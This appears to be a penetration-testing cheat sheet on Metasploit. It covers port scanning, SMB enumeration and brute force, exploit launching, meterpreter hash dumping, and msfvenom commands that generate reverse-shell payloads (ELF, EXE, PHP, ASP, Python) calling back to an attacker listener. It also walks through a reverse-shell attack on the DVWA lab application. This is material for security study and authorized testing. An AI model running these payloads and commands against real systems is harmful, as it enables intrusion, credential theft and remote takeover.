Metasploit
Tool for scanning, vulnerability assessment and exploitation
Last updated
Tool for scanning, vulnerability assessment and exploitation
Last updated
Metasploit has a number of modules to scan open ports on the target system. Use the command search portscan to list potential port scanning modules. The following are common modules to use:
portscan/tcp: TCP Port Scanner
portscan/syn: TCP SYN Port Scanner
portscan/ack: TCP ACK Firewall Scanner
It's also possible to perform nmap scans directly from the metasploit console.
The scanner/discovery/udp_sweep module allows to quickly identify services running over the UDP (User Datagram Protocol). Although the scan does not conduct an extensive scan of all possible UDP services, it does provide a quick way to identify services such as DNS or NetBIOS.
The smb_enumshares and smb_version modules are useful in a corporate network and help enumerate smb services.
Use the smb_login module to brute force known usernames with a password list. Warning: This can be very slow, so only use if there's evidence
To organize target information within an engagement, the metasploit database can be used by setting up a PostgreSQL database.
Start PostgreSQL: systemctl start postgresql
Initialize the metasploit database: msfdb init
Start metasploit: msfconsole
Check databsase status: db_status
Add workspace: workspace -a $WORKSPACE
Once the database is setup, db_nmap can be used to save nmap scan results. The commands hosts and services can be used to show information relevant to hosts and services on a target system.
Search for exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit or run. The success of a kill chain heavily relies on a thorough understanding of services running on the target system.
Use show payloads and set payload to choose a useful payload if a preset default in not present. This could often be a trial and error process due to environmental or OS restrictions. Use show options command to show parameters that can be customized. Common parameters include:
RHOSTS: Target system(s)
RPORT: Target port
LHOST: Listening Host
LPORT: Listening Port
PAYLOAD: The payload to execute i.e. shell, stager, rce
You can background a session using CTRL+Z or abort using CTRL+C. This is very helpful when working on more than one target simultaneously.
The sessions command will list active commands while the -i tag can choose one of the listed sessions to interact with.
Once in a shell, the shell can sometimes be upgraded to a meterpreter session using the command sessions -u $ID which can be very helpful for managing pivots and post exploitation methodologies. Two very useful commands include search and hashdump which allow for file searching and NTLM hash dumping.
Msfvenom is the metasploit tool used to generate payloads. It can access the payload library and allows full customization of a payload including format, architecture, target system, and bad characters.
Output formats can be viewed using the msfvenom --list command. Encoders cna be specified with the -e parameter. The following is an example of a command utilizing msfvenom:
msfvenom -p php/meterpreter/reverse_tcp LHOST=$IP -f raw -e php/base64
This is one of the most useful parts of metasploit. Within the metasploit framework, this part is automatically handled by an exploit module. Handlers are designed to catch a shell that is coming from a target back to the attacker machine.
The following scenario follows exploiting the file upload vulnerability present in DVWA (Damn Vulnerable Web Application):
Generate the PHP shell using MSFvenom (this will need to be modified post generation to add php start and end tags):
msfvenom -p php/reverse_php LHOST=$IP LPORT=1337 -f raw > reverse_shell.php
Start the metasploit handler:
msfconsole; use exploit/multi/handler; set LHOST $IP; set LPORT 1337; run
Execute the PHP shell
COMMON EXAMPLES:
Linux Executable (32) and Linkable Format:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f elf > rev_shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f exe > rev_shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=1337 -f raw > rev_shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f asp > rev_shell.asp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=$IP LPORT=1337 -f raw > rev_shell.py
All of these example are reverse payloads and work with the exploit/multi/handler module.
